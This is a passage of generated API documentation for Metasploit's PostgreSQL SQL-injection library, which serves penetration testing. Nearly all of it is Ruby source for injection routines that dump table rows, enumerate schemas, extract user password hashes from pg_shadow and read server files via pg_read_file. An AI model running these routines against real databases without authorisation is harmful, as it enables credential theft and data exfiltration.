<span class='id identifier rubyid_limit'>limit</span> <span class='op'>=</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>&gt;</span> <span class='int'>0</span> <span class='op'>?</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'> limit </span><span class='tstring_end'>&#39;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_num_limit'>num_limit</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='kw'>if</span> <span class='ivar'>@safe</span>
<span class='comment'># no group_concat, leak one row at a time
</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select count(1)::text from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_to_i'>to_i</span>
<span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>=</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='kw'>if</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>==</span> <span class='int'>0</span> <span class='op'>||</span> <span class='id identifier rubyid_row_count'>row_count</span> <span class='op'>&lt;</span> <span class='id identifier rubyid_num_limit'>num_limit</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_num_limit'>num_limit</span><span class='period'>.</span><span class='id identifier rubyid_times'>times</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_current_row'>current_row</span><span class='op'>|</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select substr(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text,^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from </span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_content'> limit 1 offset </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_current_row'>current_row</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='tstring_content'> limit 1 offset </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_current_row'>current_row</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='comment'># if limit &gt; 0, an alias will be necessary
</span> <span class='kw'>if</span> <span class='id identifier rubyid_num_limit'>num_limit</span> <span class='op'>&gt;</span> <span class='int'>0</span>
<span class='id identifier rubyid_alias1'>alias1</span><span class='comma'>,</span> <span class='id identifier rubyid_alias2'>alias2</span> <span class='op'>=</span> <span class='int'>2</span><span class='period'>.</span><span class='id identifier rubyid_times'>times</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha'>rand_text_alpha</span><span class='lparen'>(</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>9</span><span class='rparen'>)</span><span class='rparen'>)</span> <span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>select substr(string_agg(</span><span class='tstring_end'>&#39;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'>, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from (select </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_content'>) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias2'>alias2</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select string_agg(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'>, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span>\
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> from (select </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias1'>alias1</span><span class='embexpr_end'>}</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_content'>) </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_alias2'>alias2</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>else</span>
<span class='kw'>if</span> <span class='ivar'>@truncation_length</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_truncated_query'>truncated_query</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>select substr(string_agg(</span><span class='tstring_end'>&#39;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;),</span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>^OFFSET^,</span><span class='embexpr_beg'>#{</span><span class='ivar'>@truncation_length</span><span class='embexpr_end'>}</span><span class='tstring_content'>) from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select string_agg(</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_columns'>columns</span><span class='embexpr_end'>}</span><span class='tstring_content'>::text, &#39;</span><span class='embexpr_beg'>#{</span><span class='ivar'>@concat_separator</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'> from </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table'>table</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_condition'>condition</span><span class='embexpr_end'>}</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_limit'>limit</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@concat_separator</span> <span class='op'>||</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>,</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_retrieved_data'>retrieved_data</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_row'>row</span><span class='op'>|</span>
<span class='id identifier rubyid_row'>row</span> <span class='op'>=</span> <span class='id identifier rubyid_row'>row</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='ivar'>@second_concat_separator</span><span class='rparen'>)</span>
<span class='ivar'>@encoder</span> <span class='op'>?</span> <span class='id identifier rubyid_row'>row</span><span class='period'>.</span><span class='id identifier rubyid_map'>map</span> <span class='lbrace'>{</span> <span class='op'>|</span><span class='id identifier rubyid_x'>x</span><span class='op'>|</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:decode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_call'>call</span><span class='lparen'>(</span><span class='id identifier rubyid_x'>x</span><span class='rparen'>)</span> <span class='rbrace'>}</span> <span class='op'>:</span> <span class='id identifier rubyid_row'>row</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_database_names-instance_method">
#<strong>enum_database_names</strong> &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the names of all the existing databases</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array of Strings, the database names</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
67
68
69</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 67</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_database_names'>enum_database_names</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>pg_database</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>datname</span><span class='tstring_end'>]</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_dbms_users-instance_method">
#<strong>enum_dbms_users</strong> &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the PostgreSQL users (their username and password), this might require elevated privileges.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>an array of arrays representing rows, where each row contains two strings, the username and hashed password</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
94
95
96
97</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 94</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_dbms_users'>enum_dbms_users</span>
<span class='comment'># might require elevated privileges
</span> <span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>pg_shadow</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>usename</span><span class='words_sep'> </span><span class='tstring_content'>passwd</span><span class='tstring_end'>]</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_table_columns-instance_method">
#<strong>enum_table_columns</strong>(table_name) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the column names of the given table in the given database</p>
<pre class="code ruby"><code class="ruby">@param table_name [String] the name of the table of which you want to query the column names
@return [Array] An array of Strings, the column names in the given table belonging to the given database
</code></pre>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
104
105
106
107
108
109
110
111
112
113</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 104</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_table_columns'>enum_table_columns</span><span class='lparen'>(</span><span class='id identifier rubyid_table_name'>table_name</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_table_name'>table_name</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_database'>database</span><span class='comma'>,</span> <span class='id identifier rubyid_table_name'>table_name</span> <span class='op'>=</span> <span class='id identifier rubyid_table_name'>table_name</span><span class='period'>.</span><span class='id identifier rubyid_split'>split</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>.</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_database'>database</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>public</span><span class='tstring_end'>&#39;</span></span> <span class='comment'># or current_database() ?
</span> <span class='kw'>end</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>information_schema.columns</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>column_name</span><span class='tstring_end'>]</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>table_name=&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_table_name'>table_name</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39; and </span><span class='tstring_end'>&quot;</span></span> \
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>table_schema=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_database'>database</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>(</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_table_names-instance_method">
#<strong>enum_table_names</strong>(database = &#39;public&#39;) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the names of the tables in a given database</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>database</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>&#39;public&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>the name of a database, or a function call, defaults to public</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array of Strings, the table names in the given database</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
76
77
78
79</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 76</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_table_names'>enum_table_names</span><span class='lparen'>(</span><span class='id identifier rubyid_database'>database</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>public</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>information_schema.tables</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>table_name</span><span class='tstring_end'>]</span></span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>table_schema=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_database'>database</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>(</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="enum_view_names-instance_method">
#<strong>enum_view_names</strong>(database = &#39;public&#39;) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Query the names of the views in the given database</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>database</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>&#39;public&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>The name of a database, or a function call, defaults to public</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>An array of Strings, the view names in the given database</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
86
87
88</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 86</span>
<span class='kw'>def</span> <span class='id identifier rubyid_enum_view_names'>enum_view_names</span><span class='lparen'>(</span><span class='id identifier rubyid_database'>database</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>public</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_dump_table_fields'>dump_table_fields</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>information_schema.views</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='qwords_beg'>%w[</span><span class='tstring_content'>table_name</span><span class='tstring_end'>]</span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>table_schema=</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_database'>database</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>(</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span> <span class='op'>?</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>:</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span> <span class='op'>+</span> <span class='id identifier rubyid_database'>database</span> <span class='op'>+</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_flatten'>flatten</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="read_from_file-instance_method">
#<strong>read_from_file</strong>(fpath, binary = false) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Attempt reading from a file on the filesystem  @return [String] The content of the file if reading was successful</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>fpath</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The path of the file to read</p>
</div>
</li>
<li>
<span class='name'>binary</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>false</tt>)</em>
&mdash;
<div class='inline'>
<p>Whether the target file should be considered a binary one (defaults to false)</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
215
216
217
218
219
220
221
222
223</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 215</span>
<span class='kw'>def</span> <span class='id identifier rubyid_read_from_file'>read_from_file</span><span class='lparen'>(</span><span class='id identifier rubyid_fpath'>fpath</span><span class='comma'>,</span> <span class='id identifier rubyid_binary'>binary</span><span class='op'>=</span><span class='kw'>false</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_binary'>binary</span>
<span class='comment'># pg_read_binary_file returns bytea
</span> <span class='comment'># an encoder might be needed
</span> <span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>pg_read_binary_file(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fpath'>fpath</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_call_function'>call_function</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>pg_read_file(&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fpath'>fpath</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;)</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="test_vulnerable-instance_method">
#<strong>test_vulnerable</strong> &#x21d2; <tt>Boolean</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks if the SQL injection is working, by checking that queries that should return known results return the results we expect from them</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Boolean</tt>)</span>
&mdash;
<div class='inline'>
<p>Whether the check determined that the injection works</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
189
190
191
192
193
194
195
196
197</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/sqli/postgresqli/common.rb', line 189</span>
<span class='kw'>def</span> <span class='id identifier rubyid_test_vulnerable'>test_vulnerable</span>
<span class='id identifier rubyid_random_string_len'>random_string_len</span> <span class='op'>=</span> <span class='ivar'>@truncation_length</span> <span class='op'>?</span> <span class='lbracket'>[</span><span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>10</span><span class='rparen'>)</span><span class='comma'>,</span> <span class='ivar'>@truncation_length</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_min'>min</span> <span class='op'>:</span> <span class='id identifier rubyid_rand'>rand</span><span class='lparen'>(</span><span class='int'>2</span><span class='op'>..</span><span class='int'>10</span><span class='rparen'>)</span>
<span class='id identifier rubyid_random_string'>random_string</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='id identifier rubyid_random_string_len'>random_string_len</span><span class='rparen'>)</span>
<span class='id identifier rubyid_query_string'>query_string</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>&#39;</span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_random_string'>random_string</span><span class='embexpr_end'>}</span><span class='tstring_content'>&#39;</span><span class='tstring_end'>&quot;</span></span>
<span class='id identifier rubyid_query_string'>query_string</span> <span class='op'>=</span> <span class='ivar'>@encoder</span><span class='lbracket'>[</span><span class='symbol'>:encode</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_sub'>sub</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>^DATA^</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='id identifier rubyid_query_string'>query_string</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='ivar'>@encoder</span>
<span class='id identifier rubyid_output'>output</span> <span class='op'>=</span> <span class='id identifier rubyid_run_sql'>run_sql</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>select </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_query_string'>query_string</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
